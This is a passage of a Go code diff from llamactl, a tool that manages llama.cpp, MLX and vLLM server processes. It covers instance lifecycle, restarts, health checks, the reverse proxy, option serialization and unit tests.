"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalInstanceSettings *config.InstancesConfig
globalBackendSettings *config.BackendConfig
// Status
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options
options.ValidateAndApplyDefaults(name, globalInstanceSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
return &Process{
Name: name,
options: options,
globalInstanceSettings: globalInstanceSettings,
globalBackendSettings: globalBackendSettings,
logger: logger,
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
}
}
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Port
}
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Host
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Host
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Host
}
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
host = i.options.MlxServerOptions.Host
port = i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
host = i.options.VllmServerOptions.Host
port = i.options.VllmServerOptions.Port
}
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
return nil
}
i.proxy = proxy
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Determine if docker is enabled for this instance's backend
var dockerEnabled bool
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeVllm:
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeMlxLm:
// MLX does not support docker currently
}
}
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
}{
Alias: (*Alias)(i),
Options: i.options,
DockerEnabled: dockerEnabled,
})
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias Process
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = aux.Options
}
return nil
}

View File

@@ -0,0 +1,465 @@
package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
)
func TestNewInstance(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if inst.IsRunning() {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestGetProxy(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"status": "running",
"options": {
"auto_restart": false,
"max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.IsRunning() {
t.Error("Expected status to be running")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
}
if opts.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "valid positive values",
maxRestarts: testutil.IntPtr(10),
restartDelay: testutil.IntPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: testutil.IntPtr(0),
restartDelay: testutil.IntPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: testutil.IntPtr(-5),
restartDelay: testutil.IntPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
})
}
}

View File

@@ -1,21 +1,25 @@
package llamactl
package instance
import (
"context"
"fmt"
"log"
"net/http"
"os/exec"
"runtime"
"syscall"
"time"
"llamactl/pkg/backends"
"llamactl/pkg/config"
)
// Start starts the llama server instance and returns an error if it fails.
func (i *Instance) Start() error {
func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()
if i.Running {
if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name)
}
@@ -30,15 +34,22 @@ func (i *Instance) Start() error {
i.restarts = 0
}
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create log files
if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err)
}
args := i.options.BuildCommandArgs()
// Build command using backend-specific methods
cmd, cmdErr := i.buildCommand()
if cmdErr != nil {
return fmt.Errorf("failed to build command: %w", cmdErr)
}
i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
i.cmd = cmd
if runtime.GOOS != "windows" {
setProcAttrs(i.cmd)
@@ -61,7 +72,7 @@ func (i *Instance) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
}
i.Running = true
i.SetStatus(Running)
// Create channel for monitor completion signaling
i.monitorDone = make(chan struct{})
@@ -75,10 +86,10 @@ func (i *Instance) Start() error {
}
// Stop terminates the subprocess
func (i *Instance) Stop() error {
func (i *Process) Stop() error {
i.mu.Lock()
if !i.Running {
if !i.IsRunning() {
// Even if not running, cancel any pending restart
if i.restartCancel != nil {
i.restartCancel()
@@ -95,8 +106,8 @@ func (i *Instance) Stop() error {
i.restartCancel = nil
}
// Set running to false first to signal intentional stop
i.Running = false
// Set status to stopped first to signal intentional stop
i.SetStatus(Stopped)
// Clean up the proxy
i.proxy = nil
@@ -106,19 +117,25 @@ func (i *Instance) Stop() error {
i.mu.Unlock()
// Stop the process with SIGINT
if i.cmd.Process != nil {
// Stop the process with SIGINT if cmd exists
if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
}
}
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select {
case <-monitorDone:
// Process exited normally
case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil {
if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill()
if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -140,7 +157,97 @@ func (i *Instance) Stop() error {
return nil
}
func (i *Instance) monitorProcess() {
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error {
if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get instance options to build the health check URL
opts := i.GetOptions()
if opts == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Build the health check URL directly
var host string
var port int
switch opts.BackendType {
case backends.BackendTypeLlamaCpp:
if opts.LlamaServerOptions != nil {
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if opts.MlxServerOptions != nil {
host = opts.MlxServerOptions.Host
port = opts.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if opts.VllmServerOptions != nil {
host = opts.VllmServerOptions.Host
port = opts.VllmServerOptions.Port
}
}
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
func (i *Process) monitorProcess() {
defer func() {
i.mu.Lock()
if i.monitorDone != nil {
@@ -155,12 +262,12 @@ func (i *Instance) monitorProcess() {
i.mu.Lock()
// Check if the instance was intentionally stopped
if !i.Running {
if !i.IsRunning() {
i.mu.Unlock()
return
}
i.Running = false
i.SetStatus(Stopped)
i.logger.Close()
// Cancel any existing restart context since we're handling a new exit
@@ -181,10 +288,11 @@ func (i *Instance) monitorProcess() {
}
// handleRestart manages the restart process while holding the lock
func (i *Instance) handleRestart() {
func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock()
return
}
@@ -223,7 +331,7 @@ func (i *Instance) handleRestart() {
}
// validateRestartConditions checks if the instance should be restarted and returns the parameters
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
if i.options == nil {
log.Printf("Instance %s not restarting: options are nil", i.Name)
return false, 0, 0
@@ -255,3 +363,49 @@ func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts
return true, maxRestarts, restartDelay
}
// buildCommand builds the command to execute using backend-specific logic
func (i *Process) buildCommand() (*exec.Cmd, error) {
// Get backend configuration
backendConfig, err := i.getBackendConfig()
if err != nil {
return nil, err
}
// Build the environment variables
env := i.options.BuildEnvironment(backendConfig)
// Get the command to execute
command := i.options.GetCommand(backendConfig)
// Build command arguments
args := i.options.BuildCommandArgs(backendConfig)
// Create the exec.Cmd
cmd := exec.CommandContext(i.ctx, command, args...)
cmd.Env = []string{}
for k, v := range env {
cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
}
return cmd, nil
}
// getBackendConfig resolves the backend configuration for the current instance
func (i *Process) getBackendConfig() (*config.BackendSettings, error) {
var backendTypeStr string
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
backendTypeStr = "llama-cpp"
case backends.BackendTypeMlxLm:
backendTypeStr = "mlx"
case backends.BackendTypeVllm:
backendTypeStr = "vllm"
default:
return nil, fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
}
settings := i.globalBackendSettings.GetBackendSettings(backendTypeStr)
return &settings, nil
}

View File

@@ -1,4 +1,4 @@
package llamactl
package instance
import (
"bufio"
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
}
// GetLogs retrieves the last n lines of logs from the instance
func (i *Instance) GetLogs(num_lines int) (string, error) {
func (i *Process) GetLogs(num_lines int) (string, error) {
i.mu.RLock()
logFileName := i.logger.logFilePath
i.mu.RUnlock()

265
pkg/instance/options.go Normal file
View File

@@ -0,0 +1,265 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"log"
"maps"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
//Environment variables
Environment map[string]string `json:"environment,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
case backends.BackendTypeMlxLm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.MlxServerOptions = &mlx.MlxServerOptions{}
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
}
}
case backends.BackendTypeVllm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.VllmServerOptions = &vllm.VllmServerOptions{}
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert backend-specific options back to BackendOptions map for JSON
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
data, err := json.Marshal(c.MlxServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
data, err := json.Marshal(c.VllmServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
